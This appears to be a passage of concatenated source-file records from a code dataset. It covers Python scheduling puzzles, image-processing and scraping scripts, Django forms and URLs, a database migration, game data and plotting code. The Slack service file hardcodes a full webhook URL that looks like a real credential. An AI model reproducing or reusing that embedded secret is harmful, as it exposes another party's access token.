'a').close()\n self.assertEqual(Square.load_from_file_csv(), [])\n","sub_path":"0x0C-python-almost_a_circle/tests/test_models/test_square.py","file_name":"test_square.py","file_ext":"py","file_size_in_byte":10396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"463347373","text":"'''\nA warehouse has one loading dock that workers use to load and unload goods.\n\nWarehouse workers carrying the goods arrive at the loading dock at different times. They form two queues, a \"loading\" queue and an \"unloading\" queue. Within each queue, the workers are ordered by the time they arrive at the dock.\n\nThe arrival time (in minutes) array stores the minute the worker arrives at the loading dock. The direction array stores whether the worker is \"loading\" or \"unloading\", \na value of \n0 ---> loading and \n1 ---> unloading. \n\nLoading/unloading takes 1 minute.\n\nWhen a worker arrives at the loading dock, if no other worker is at the dock at the same time, then the worker can use the dock.\n\nIf a \"loading\" worker and an \"unloading\" worker arrive at the dock at the same time, then we decide who can use the dock with these rules:\n\nif the loading dock was not in use in the previous minute, then the unloading worker can use the dock.\nif the loading dock was just used by another unloading worker, then the unloading worker can use the dock.\nif the loading dock was just used by another loading worker, then the loading worker can use the dock.\nReturn an array of the time (in minute) each worker uses the dock.\n\nExamples\nExample 1:\nInput:\ntime = [0, 0, 1, 6] direction = [0, 1, 1, 0]\n\nOutput:\n[2, 0, 1, 6]\n\nExplanation:\nAt time 0, worker 0 and 1 want to use the dock. Worker 0 wants to load and worker 1 wants to unload. The dock was not used in the previous minute, so worker 1 unload first.\nAt time 1, workers 0 and 2 want to use the rock. Worker 2 wants to unload, and at the previous minute the dock was used to unload, so worker 2 uses the dock.\nAt time 2, worker 0 is the only worker at the dock, so he uses the dock.\nAt time 6, worker 3 arrives at the empty dock and uses the dock.\nWe return [2, 0, 1, 6].\n'''\n\nfrom typing import List\nfrom collections import deque\n\ndef getTimes(numCustomers: int, arrTime: List[int], direction: List[int]) -> List[int]:\n \n load_queue = deque() # customers in the enter queue\n unload_queue = deque() # customers in the exit queue\n cur_time = -1\n last_used_type = 'UNLOAD'\n \n for i in range(numCustomers):\n if direction[i] == 0:\n load_queue.append((arrTime[i], i)) # push (arrival time, custom id) into the queue\n else:\n unload_queue.append((arrTime[i], i))\n \n ans = [-1] * numCustomers\n \n while load_queue and unload_queue:\n if load_queue[0][0] <= cur_time and unload_queue[0][0] <= cur_time: # both customers are at the turnstile\n if cur_time == -1 or last_used_type == 'UNLOAD': # prev sec not used or last used as exit\n cur_queue = unload_queue\n else:\n cur_queue = load_queue\n elif load_queue[0][0] < unload_queue[0][0]: # only customer from enter queue at turnstile\n cur_queue = load_queue\n else: # only customer from exit queue at turnstile\n # when both arrive at the same time, OR unload arrives before load\n cur_queue = unload_queue\n time, i = cur_queue.popleft()\n if cur_queue == load_queue:\n last_used_type = 'LOAD'\n else:\n last_used_type = 'UNLOAD'\n cur_time = max(time, cur_time)\n ans[i] = cur_time\n cur_time += 1\n \n remaining_queue = load_queue if load_queue else unload_queue\n \n while remaining_queue:\n time, i = remaining_queue.popleft()\n cur_time = max(time, cur_time)\n ans[i] = cur_time\n cur_time += 1\n \n return ans\n\nif __name__ == \"__main__\":\n numCustomers = int(input())\n arrTime = [int(y) for y in input().split()]\n direction = [int(z) for z in input().split()]\n res = getTimes(numCustomers, arrTime, direction)\n print(' '.join(str(e) for e in res))","sub_path":"AmazonOA/turnstile.py","file_name":"turnstile.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"235130273","text":"import os\n\nfrom string import ascii_lowercase as letters\nimport numpy as np\nfrom PIL import Image\n\ndef get_links(info,index,num_classes,cur_class, num=None):\n for i in os.listdir(os.curdir):\n if(i == \"prediction\"):\n if(not cur_class+num in info.keys()):\n info[cur_class+num] = [[0 for j in range(num_classes)]]\n info[cur_class+num][0][index] = os.getcwd()+\"/\" + i\n elif(i == \"signal\"):\n if(not cur_class+num in info.keys()):\n info[cur_class+num] = [[0 for j in range(num_classes)]]\n info[cur_class+num].append(os.getcwd()+\"/\" + i)\n elif(i == \"00\" or i == \"01\" or i==\"02\" or i==\"03\" or i==\"04\"):\n temp = os.getcwd()\n os.chdir(i)\n get_links(info,index,num_classes,cur_class, num=i)\n os.chdir(temp)\n elif(not os.path.isfile(i)):\n temp = os.getcwd()\n os.chdir(i)\n get_links(info,index,num_classes,cur_class,num)\n os.chdir(temp)\n \ndictionary = {}\n\ndef generate_links(info, classes=None,curclass = None):\n for i in os.listdir(os.curdir):\n if(i==\"v1-synthesized\"):\n temp = os.getcwd()\n os.chdir(i)\n classes = os.listdir(os.curdir)\n if('classes.txt' in classes):\n classes.remove('classes.txt')\n #classes.append('membrane_caax_63x')\n classes.sort()\n\n \n F = open(\"classes.txt\",\"a\")\n F.write(str(classes) + \"\\n\")\n F.close()\n \n for j in classes:\n temp2 = os.getcwd()\n os.chdir(j)\n generate_links(info, classes, j)\n os.chdir(temp2)\n os.chdir(temp)\n elif(classes and i in classes):\n temp = os.getcwd()\n os.chdir(i)\n get_links(info,classes.index(i),len(classes),curclass)\n os.chdir(temp)\n elif(not os.path.isfile(i)):\n temp = os.getcwd()\n os.chdir(i)\n generate_links(info,classes,curclass)\n os.chdir(temp)\n\n\n\ntemp = os.getcwd()\nos.chdir('images')\ngenerate_links(dictionary)\nos.chdir(temp)\n\ndef generate_names(n=64,prefix=\"x\"):\n counter = 0\n result = []\n for i in letters:\n for j in letters:\n for k in letters:\n if(counter == n):\n return result\n result.append(prefix + i + j + k)\n counter+=1\n\ndef generate_array(path, names):\n return np.array( [ np.array(Image.open(path + \"/\" + i + \".png\"))/65535.0 for i in names])\n\ndef write_array(dictionary):\n if( os.path.isdir(\"data\") ):\n return\n os.mkdir('data')\n for i in range(14):\n os.mkdir('data/' + str(i))\n counter = 0\n info = open(\"info.txt\",\"w\")\n \n for key in sorted(dictionary.keys()):\n pairs = dictionary[key]\n arrays = []\n print(counter)\n for i in range(len(pairs[0])):\n names = generate_names(len(os.listdir(pairs[0][i])))\n arrays.append(generate_array(pairs[0][i], names))\n print(pairs[1])\n arrays.append(generate_array(pairs[1],names))\n # assert correctness\n assert len(arrays)==14\n for i in range(1,len(arrays)):\n assert arrays[i].shape == arrays[i-1].shape\n \n for d in range(32,arrays[0].shape[0]+1,32):\n for h in range(64,arrays[0].shape[1]+1,64):\n for w in range(64, arrays[0].shape[2]+1,64):\n for i in range(len(arrays)):\n array = arrays[i][d-32:d,h-64:h,w-64:w]\n assert array.shape == (32,64,64)\n np.save('data/'+str(i) + '/' + str(counter), array)\n info = open('data/'+str(i) + '/info.txt','a')\n if(i == 13):\n path = pairs[1]\n else:\n path = pairs[0][i]\n info.write(str(counter) + \"\\t\" + str((d-32,d)) + \"\\t\" + str((h-64,h)) + \"\\t\" + str((w-64,w)) + \"\\t\" + path + \"\\n\")\n info.close()\n counter = counter + 1\n for d in range(32,arrays[0].shape[0]+1,32):\n for h in range(64,arrays[0].shape[1]+1,64):\n for w in range(64, arrays[0].shape[2]+1,64):\n for i in range(len(arrays)):\n shape = arrays[i].shape\n array = arrays[i][shape[0]-d:shape[0]-d+32,shape[1]-h:shape[1]-h+64,shape[2]-w:shape[2]-w+64]\n assert array.shape == (32,64,64)\n np.save('data/'+str(i) + '/' + str(counter), array)\n info = open('data/'+str(i) + '/info.txt','a')\n if(i == 13):\n path = pairs[1]\n else:\n path = pairs[0][i]\n info.write(str(counter) + \"\\t\" + str((shape[0]-d,shape[0]-d+32)) + \"\\t\" + str((shape[1]-h,shape[1]-h+64)) + \"\\t\" + str((shape[2]-w,shape[2]-w+64)) + \"\\t\" + path + \"\\n\")\n info.close()\n counter = counter + 1\n \nwrite_array(dictionary)\n \n#indices = []\n#validation_failed = False\n\n\"\"\"\nfor key in sorted(dictionary.keys()):\n #if(key == 'alpha_tubulin03' or key == 'fibrillarin03' or key == 'lamin_b100'):\n # continue\n pairs = dictionary[key]\n s = \"\"\n index = 0\n for i in pairs[0]:\n #if(index>=len(indices)):\n # indices.append(i.split('\\\\')[11])\n #else:\n # validation_failed = i.split('\\\\')[11] != indices[index]\n s+= i + \",\"\n index+=1\n s=s[:-1]\n s=s+\"\\t\"+pairs[1]\n print(s)\n\"\"\"\n\n#print indices\n#print validation_failed\n\n\n\"\"\"print os.getcwd()\nos.chdir(\"images\")\nos.chdir('AICS')\nos.chdir('BF-FM')\nos.chdir('v1-synthesized')\nos.chdir('dna')\nos.chdir('evaluate')\nos.chdir('dna')\nos.chdir('03')\nprint os.getcwd()\nprint os.listdir(os.getcwd())\"\"\"\n","sub_path":"processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":6354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"638237412","text":"from urllib.parse import urlencode\r\n\r\nimport requests\r\nfrom requests import RequestException\r\n\r\nimport json\r\n\r\nfrom multiprocessing import Pool\r\n\r\nfrom config import *\r\n\r\nimport os\r\n\r\n\r\nclass Spider(object):\r\n def __init__(self):\r\n self.__counter = 0\r\n self.__path = 'C:/Users/COLDPLAY/Desktop'\r\n self.__timeout = 0.5\r\n\r\n def __get_page_index(self, pn):\r\n data = {\r\n 'tn': 'resultjsonavatarnew',\r\n 'word': KEYWORD,\r\n 'pn': pn\r\n }\r\n url = 'http://image.baidu.com/search/avatarjson?' + urlencode(data)\r\n print(url)\r\n try:\r\n response = requests.get(url)\r\n if response.status_code == 200:\r\n return response.text\r\n return None\r\n except RequestException:\r\n print('请求索引页出错...')\r\n return None\r\n\r\n def __parse_page_index(self, html):\r\n try:\r\n data = json.loads(html)\r\n for item in data.get('imgs'):\r\n yield item.get('objURL')\r\n # print(item.get('objURL'))\r\n except JSONDecodeError:\r\n pass\r\n\r\n def __save_images(self, urls):\r\n path = self.__path + '/' + KEYWORD\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n for url in urls:\r\n self.__download_images(url, path)\r\n\r\n def __download_images(self, url, path):\r\n\r\n print('正在下载' + str(self.__counter) + '张图片...')\r\n try:\r\n response = requests.get(url)\r\n if response.status_code == 200:\r\n with open(path + '/' + str(self.__counter) + '.jpg', 'wb') as f:\r\n f.write(response.content)\r\n self.__counter += 1\r\n else:\r\n print('下载失败')\r\n except Exception:\r\n print('下载失败')\r\n\r\n def craw(self, pn):\r\n html = self.__get_page_index(pn)\r\n urls = self.__parse_page_index(html)\r\n self.__save_images(urls)\r\n\r\n\r\n# def main(pn):\r\n# spider = Spider()\r\n# spider.craw(pn)\r\n\r\nif __name__ == '__main__':\r\n spider = Spider()\r\n # groups = [x for x in range(GROUP_START, GROUP_END)]\r\n # pool = Pool()\r\n # pool.map(spider.craw, groups)\r\n while GROUP_START <= GROUP_END:\r\n print('正在下载' + str(GROUP_START) + '页...')\r\n spider.craw(GROUP_START)\r\n GROUP_START += 1\r\n","sub_path":"ProjectCode/BaiduTupian/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"105806122","text":"from django.urls import path, include\nfrom . import views\nfrom django.contrib.auth.views import LoginView, LogoutView\n\n\nurlpatterns = [\n path('', views.all, name = 'forum_homepage'),\n path('newpost', views.NewPost.as_view(), name= 'new_post'),\n path('post', views.single_post, name= 'single_post'),\n path('post//delete', views.DeletePost.as_view(), name= 'delete_post'),\n path('comment//delete', views.DeleteComment.as_view(), name= 'delete_comment'),\n\n]","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"1863084","text":"from django import forms\nfrom .models import USERMODEL, Extra\nfrom django.forms.fields import DateField\nfrom django.contrib.admin.widgets import AdminDateWidget\nfrom django.forms.widgets import DateInput\n\nclass UserTypeForm(forms.ModelForm):\n class Meta:\n model = USERMODEL\n labels = {'aname':'Name','type':'Account Type','phno':'Mobile Number','dob':'Date of Birth','bg':'Blood Group','sex':'Sex:'}\n fields = ['aname','type','phno','dob','bg','sex']\n widgets={\n 'dob': DateInput(attrs={'type':'date'})\n }\n\nclass ExtraForm(forms.ModelForm):\n class Meta:\n model = Extra\n fields =['qu','fi']\n labels = {'qu':'Qualifications','fi':'Field of Expertise'}\n","sub_path":"connectcare/profiledet/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"199759071","text":"import pandas as pd\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import metrics\r\n\r\n# DEFINE VARIABLES\r\n\r\n\r\n#define Input/Output Files\r\n\r\ninfile = 'Issuances_Tots.csv'\r\noutfile = 'Issuances_Tots_out.csv'\r\n\r\n#Import file\r\n\r\ndf = pd.read_csv(infile)\r\n\r\n#Set Index Field\r\n\r\ndf.set_index(['Guest_ID'], inplace=True)\r\n\r\n#Fill Nulls/NaN\r\n\r\ndf.fillna(value=0, inplace=True)\r\n\r\n# define data columns\r\n\r\ncols = df.columns.values.tolist()\r\n\r\ndata = df[cols]\r\n\r\ndata_array = data.values\r\n\r\nprint(\"Data Imported and Defined\")\r\n\r\nfor i in range(2, 11):\r\n #Define Kmeans Analysis\r\n\r\n kmeans_calc = KMeans(init='k-means++', n_clusters=i, n_init=600)\r\n\r\n #Run kmeans on dataframe\r\n\r\n kmeans_calc.fit(df)\r\n\r\n #Add resulting array to dataframe\r\n\r\n df['kmeans_group' + str(i)] = kmeans_calc.labels_\r\n\r\n # define target\r\n\r\n target = df['kmeans_group' + str(i)]\r\n\r\n target_array = target.values\r\n\r\n # Run Silhouette Score\r\n\r\n df['sil' + str(i)] = metrics.silhouette_score(data_array, target_array, sample_size=1000)\r\n\r\n print(\"finished \" + str(i) + \" cluster groups\")\r\n\r\n#Output dataframe to csv\r\n\r\ndf.to_csv(outfile)\r\n\r\n","sub_path":"Analysis/clusteringloop.py","file_name":"clusteringloop.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"191830722","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\nimport requests\nfrom furl import furl\nfrom slack_bang import app_config, channel_tokens\n\nDEFAULT_WEBHOOK_URI = app_config.get('slack_webhook_uri', 'https://hooks.slack.com/services/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')\nBAMBOO_URL = app_config.get('BAMBOO_URL', os.getenv('BAMBOO_URL', 'https://bamboo.dglecom.net'))\nBAMBOO_USER = app_config.get('BAMBOO_USER', os.getenv('BAMBOO_USER'))\nBAMBOO_PASSWORD = app_config.get('BAMBOO_PASSWORD', os.getenv('BAMBOO_PASSWORD'))\n\nclass SlackPostException(Exception):\n pass\n\n\nclass UnauthorizedException(Exception):\n pass\n\n\nclass GenericMessageService(object):\n WEBHOOK_URI = DEFAULT_WEBHOOK_URI\n\n def __init__(self, token, channel, text, *args, **kwargs):\n self.token = token\n self.channel = channel\n self.text = text\n self.attachments = json.loads(kwargs.get('attachments', '[]'))\n\n if channel_tokens.get(token) != channel:\n raise UnauthorizedException('Token {t} is not allowed to post to channel {c}'.format(t=token, c=channel))\n\n # optionals\n self.username = kwargs.get('username', 'monkey-bot')\n self.emoji = kwargs.get('emoji', ':monkey_face:')\n self.webhook_url = kwargs.get('webhook_url', self.WEBHOOK_URI)\n\n def process(self):\n data = {\n \"text\": self.text,\n \"channel\": \"#{channel}\".format(channel=self.channel),\n \"link_names\": 1,\n \"username\": self.username,\n \"icon_emoji\": \"{emoji}\".format(emoji=self.emoji),\n }\n\n if self.attachments: # may not be null at slack\n data['attachments'] = self.attachments\n\n resp = requests.post(self.webhook_url, json=data)\n\n if resp.ok:\n return resp\n else:\n raise SlackPostException(resp.content)\n\n\nclass ProjectBuildService(object):\n WEBHOOK_URI = DEFAULT_WEBHOOK_URI\n\n def __init__(self, version, plan_name, build_url, channel, *args, **kwargs):\n self.version = version\n self.plan_name = plan_name\n self.build_url = build_url\n self.channel = channel\n\n # optionals\n self.text = kwargs.get('text', \"Build Complete: {build_url}\".format(build_url=self.build_url))\n\n self.plan, self.build_no = self.bamboo_build_url_components(build_url=self.build_url)\n\n if self.plan and self.build_no:\n self.build_result = self.get_bamboo_build_result(plan=self.plan,\n build_no=self.build_no)\n\n self.username = kwargs.get('username', 'build-info')\n\n self.emoji = kwargs.get('emoji', ':cherries:')\n self.webhook_url = kwargs.get('webhook_url', self.WEBHOOK_URI)\n\n def bamboo_build_url_components(self, build_url):\n url = furl(build_url)\n build = str(url.path).split('/')\n try:\n build_name = build[-1:][0]\n # ['OBB', 'DB', '152']\n build_no = build_name.split('-')[-1:][0]\n # ['152']\n plan = '-'.join(build_name.split('-')[0:-1])\n # 'OBB-DB'\n return plan, build_no\n except IndexError:\n return None, None\n\n def get_bamboo_build_result(self, plan, build_no):\n # https://bamboo.dglecom.net/rest/api/latest/result/OBB-DB/152.json\n url = furl('{url}/rest/api/latest/result/{plan}/{build_no}.json'.format(url=BAMBOO_URL,\n plan=plan,\n build_no=build_no))\n resp = requests.get(url, auth=(BAMBOO_USER, BAMBOO_PASSWORD))\n data = {}\n if resp.ok:\n data = resp.json()\n return data.get('state', 'Unknown')\n\n def process(self):\n attachments = [{\n \"text\": \"Version: {version}\".format(version=self.version)\n }]\n\n if self.plan_name:\n attachments.append({\"text\": \"Plan: {plan_name}\".format(plan_name=self.plan_name)})\n if self.build_url:\n attachments.append({\"text\": \"Build: {build_url}\".format(build_url=self.build_url)})\n if self.build_result:\n attachments.append({\"text\": \"Result: {build_result}\".format(build_result=self.build_result)})\n\n data = {\n \"text\": self.text,\n \"attachments\": attachments,\n \"channel\": \"{channel}\".format(channel=self.channel),\n \"link_names\": 1,\n \"username\": self.username,\n \"icon_emoji\": \"{emoji}\".format(emoji=self.emoji)\n }\n\n resp = requests.post(self.webhook_url, json=data)\n if resp.ok:\n return resp\n else:\n raise SlackPostException(resp.content)","sub_path":"src/slack_bang/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"239316676","text":"\"\"\"empty message\n\nRevision ID: 8e1946a2db65\nRevises: 479a14cf9fee\nCreate Date: 2020-08-23 02:15:35.285398\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '8e1946a2db65'\ndown_revision = '479a14cf9fee'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('projects',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=128), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_index(op.f('ix_projects_timestamp'), 'projects', ['timestamp'], unique=False)\n op.create_table('user_projects',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('project_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ondelete='CASCADE'),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.drop_index('ix_project_timestamp', table_name='project')\n op.drop_table('project')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('project',\n sa.Column('id', sa.INTEGER(), nullable=False),\n sa.Column('body', sa.VARCHAR(length=140), nullable=True),\n sa.Column('timestamp', sa.DATETIME(), nullable=True),\n sa.Column('user_id', sa.INTEGER(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index('ix_project_timestamp', 'project', ['timestamp'], unique=False)\n op.drop_table('user_projects')\n op.drop_index(op.f('ix_projects_timestamp'), table_name='projects')\n op.drop_table('projects')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/8e1946a2db65_.py","file_name":"8e1946a2db65_.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546427502","text":"from constants import *\nfrom sokr import *\nfrom terrain import *\n\ndef data():\n \"\"\"Локальный поставщик диалогов на рынок\"\"\"\n D1 = \"dialogue\"\n D2 = \"tutorialup\"\n \n \"\"\"Блоки, присутствующие в зоне\"\"\"\n \"\"\"По старинному обычаю - только исполняемые, т.к. для иных есть sokr\"\"\"\n\n sev_stone = piano(\"Seven\") \n sev_stone.set_pokereaction(\"to_act\", start_dial(D1,D2,0))\n \n day_stone = piano(\"Days\")\n day_stone.set_pokereaction(\"to_act\", start_dial(D1,D2,1))\n \n of_stone = piano(\"Of\")\n of_stone.set_pokereaction(\"to_act\", start_dial(D1,D2,2))\n\n metallic = stand(\"Gate\")\n metallic.set_pokereaction(\"to_act\", start_dial(D1,D2,3))\n\n lever1 = stand(\"Lever\")\n lever1.set_pokereaction(\"to_act\", start_dial(D1,D2,4))\n\n lever2 = stand(\"Lever\")\n lever2.set_pokereaction(\"to_act\", start_dial(D1,D2,5))\n\n well = stand(\"Well\")\n well.set_pokereaction(\"to_act\", start_dial(D1,D2,12))\n\n #Созидание местностей (в принципе, многих, но тут одна)\n\n area = [None]*1\n\n # Удивительно, но init (технически) можно объединить с reinit-ом.\n area[0] = Terrain(15, 5, rag('ground'), stand('Tree'))\n \n #1 #2 #3 #4 #5\n area[0].reinit([[1, 0, 0, 0, 1], # 1\n [0, 0, 2, 0, 0], # 2\n [0, 0, 0, 0, 0], # 3\n [0, 1, 0, 1, 1], # 4\n [1, 1, 4, 1, 1], # 5\n [3, 1, 4, 1, 5], # 6\n [0, 0, 0, 0, 0], # 7\n [1,10,12, 1, 1], # 8\n [0, 9,11, 1, 1], # 9\n [0, 0, 0, 0, 0], # 10\n [1, 1, 1, 1, 0], # 11\n [0, 0, 0, 0, 0], # 12\n [0, 6, 7, 8, 0], # 13\n [0, 0, 0, 0, 1], # 14\n [1, 1, 0, 0, 1]], # 15\n\n [rag('ground'), #0\n stand('Tree'), #1\n well, #2\n lever1, #3\n metallic, #4\n lever2, #5\n sev_stone, #... \n day_stone,\n of_stone,\n rag('press'),\n rag('A'),\n rag('to'),\n rag('interact')])\n\n return area\n","sub_path":"terrain_tutorialup.py","file_name":"terrain_tutorialup.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"60623059","text":"from typing import List\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport os\n\nsns.set_style(\"white\")\nplt.rc('font', family='serif')\n\nabsolute_dir = \"/Users/Stanley/Desktop/Tyrrell Lab/\" \\\n \"ROP Project/PCA-Clustering-Project/results/\"\n\n\ndef get_pc_selection_dfs(dataset_used: str) -> list:\n \"\"\"Return list of DataFrames for Selection Methods for Number of Principal\n Components.\n \"\"\"\n # Get Paths to Selection Dfs\n paths = []\n for root, dirs, files in os.walk(absolute_dir+\"pc_selection\",\n topdown=False):\n for name in files:\n paths.append(os.path.join(root, name))\n paths_series = pd.Series(paths)\n idx = paths_series.str.contains(dataset_used)\n paths_series = paths_series[idx].reset_index(drop=True)\n\n # Get dataframes for pcs selected\n dfs = []\n for path in paths_series:\n dfs.append(pd.read_csv(path))\n\n return dfs\n\n\n# Divide by Max Number of PCs\ndef divide_by_max_pcs(x):\n return x/min(x[\"sample_size\"], 512)\n\n\n# PLOT Selection Methods\ndef plot_selection_methods(dfs: List[List[pd.DataFrame]]) -> None:\n \"\"\"Create Plots for selection methods for number of principal components to\n keep.\"\"\"\n\n # Plot Prep.\n x_tick_labels = list(set(dfs[0][0].sample_size))\n x_tick_labels.sort()\n x_ticks = np.array(list(range(1, len(x_tick_labels)+1))*4).reshape(\n len(x_tick_labels), 4).transpose().flatten()\n x_tick_loc = list(range(1, len(x_tick_labels)+1))\n\n # 1) Plot Percent Variance -based Methods of Selection\n fig_1 = plt.figure()\n fig_1.subplots_adjust(wspace=0)\n fig_1.set_tight_layout(True)\n ax1 = fig_1.add_subplot(131)\n ax2 = fig_1.add_subplot(132, sharey=ax1)\n ax3 = fig_1.add_subplot(133, sharey=ax1)\n\n ax1.set_title(\"Bone Age\")\n ax1.set_ylabel(\"Suggested Number of PCs\")\n ax1.set_ylim([0, 450])\n ax1.set_xticks(x_tick_loc)\n ax1.set_xticklabels(x_tick_labels, rotation=315)\n\n ax1.scatter(x=x_ticks, y=dfs[0][0][\"Cum. Perc. Var. (0.8)\"],\n c=\"r\", s=15, alpha=0.5, label=\"CPV >= 0.8\")\n\n ax1.scatter(x_ticks, dfs[0][0][\"Cum. Perc. Var. (0.99)\"],\n c=\"g\", s=15, alpha=0.5, label=\"CPV >= 0.99\")\n\n ax1.scatter(x_ticks, dfs[0][0][\"Minimum Mode CV\"],\n c=\"orange\", s=15, marker=\"^\", alpha=0.5, label=\"Min. Mode\")\n\n ax2.set_title(\"PSP Plates\")\n ax2.set_xlabel(\"Sample Size\", labelpad=10)\n ax2.set_xticks(x_tick_loc)\n ax2.set_xticklabels(x_tick_labels, rotation=315)\n\n ax2.scatter(x=x_ticks, y=dfs[1][0][\"Cum. Perc. Var. (0.8)\"],\n c=\"r\", s=15, alpha=0.5, label=\"CPV >= 0.8\")\n\n ax2.scatter(x_ticks, dfs[1][0][\"Cum. Perc. Var. (0.99)\"],\n c=\"g\", s=15, alpha=0.5, label=\"CPV >= 0.99\")\n\n ax2.scatter(x_ticks, dfs[1][0][\"Minimum Mode CV\"],\n c=\"orange\", s=15, marker=\"^\", alpha=0.5, label=\"Min. Mode\")\n\n # Plot Prep.\n x_tick_labels = list(set(dfs[2][0].sample_size))\n x_tick_labels.sort()\n x_ticks = []\n for i in range(len(x_tick_labels)):\n x_ticks += 4 * [i+1]\n x_tick_loc = list(range(1, len(x_tick_labels)+1))\n\n ax3.set_title(\"CIFAR 10\")\n ax3.set_xticks(x_tick_loc)\n ax3.set_xticklabels(x_tick_labels, rotation=315)\n\n ax3.scatter(x=x_ticks, y=dfs[2][0][\"Cum. Perc. Var. (0.8)\"],\n c=\"r\", s=15, alpha=0.5, label=\"CPV >= 0.8\")\n\n ax3.scatter(x_ticks, dfs[2][0][\"Cum. Perc. Var. (0.99)\"],\n c=\"g\", s=15, alpha=0.5, label=\"CPV >= 0.99\")\n\n ax3.scatter(x_ticks, dfs[2][0][\"Minimum Mode CV\"],\n c=\"orange\", s=15, marker=\"^\", alpha=0.5, label=\"Min. Mode\")\n\n plt.setp(ax2.get_yticklabels(), visible=False)\n plt.setp(ax3.get_yticklabels(), visible=False)\n ax1.legend(shadow=True, loc=\"upper left\")\n\n\n# PLOT CV vs. Random Seed\ndef plot_cv_random_seed(dataset_used: str,\n dfs: list, sample_sizes: list) -> None:\n \"\"\"Create plots for CV vs. Random Seed for each sample size.\"\"\"\n df_cv_random = pd.DataFrame()\n random_seeds = [1969, 1974, 2000, 2001]\n df_cv_random[\"sample_size\"] = dfs[0][\"sample_size\"]\n for i in range(len(dfs)):\n df_cv_random[str(random_seeds[i])] = dfs[i][\"Minimum Mode CV\"]\n\n for size in np.unique(sample_sizes):\n idx = df_cv_random.sample_size == size\n plt.figure()\n for seed_idx in range(len(random_seeds)):\n plt.scatter([seed_idx]*4,\n df_cv_random.loc[idx][str(random_seeds[seed_idx])],\n alpha=0.3, c=\"midnightblue\")\n\n plt.xticks(list(range(4)), labels=random_seeds)\n plt.ylabel(\"Number of PCs Suggested\")\n plt.xlabel(\"Random Seed\")\n plt.title(f\"{dataset_used} | CV-based selection for {size} \" + \\\n \"training samples\")\n # plt.ylim([0, 450])\n plt.ylim([0, 1])\n plt.show()\n\n\nif __name__ == \"__main__\":\n # Get Dataset Choice\n # dataset_choice = int(\n # input(\"DATASET: ** 1: boneage, 2: psp_plates, 3: cifar\\n\"))\n\n all_dfs = []\n\n for dataset_choice in [1, 2, 3]:\n if dataset_choice == 1:\n dataset_used = \"boneage\"\n sample_sizes = [300] * 4\n sample_sizes += [700] * 4\n sample_sizes += [5674] * 4\n sample_sizes += [2837] * 4\n elif dataset_choice == 3:\n dataset_used = \"cifar10\"\n sample_sizes = [12000] * 4\n sample_sizes += [2000] * 4\n sample_sizes += [400] * 4\n sample_sizes += [8000] * 4\n sample_sizes += [800] * 4\n else:\n dataset_used = \"psp_plates\"\n sample_sizes = [100] * 4\n sample_sizes += [300] * 4\n sample_sizes += [2928] * 4\n sample_sizes += [1464] * 4\n\n # Concatenate PC Selection + Sample Sizes\n dfs = get_pc_selection_dfs(dataset_used)\n\n for df in dfs:\n df[\"sample_size\"] = sample_sizes\n df.sort_values(by=[\"sample_size\"], inplace=True, ignore_index=True)\n\n all_dfs.append(dfs)\n # Divide by max_pcs\n # dfs[0] = dfs[0].apply(divide_by_max_pcs, axis=1)\n\n plot_selection_methods(all_dfs)\n\n\n\n\n","sub_path":"scripts/plot_pc_selection.py","file_name":"plot_pc_selection.py","file_ext":"py","file_size_in_byte":6249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"302854585","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport hashlib\nimport math\nimport os.path\nimport random\nimport re\nimport sys\nimport tarfile\nimport python_speech_features\n\nimport numpy as np\nfrom six.moves import urllib\nfrom six.moves import xrange # pylint: disable=redefined-builtin\nimport tensorflow as tf\n\nfrom 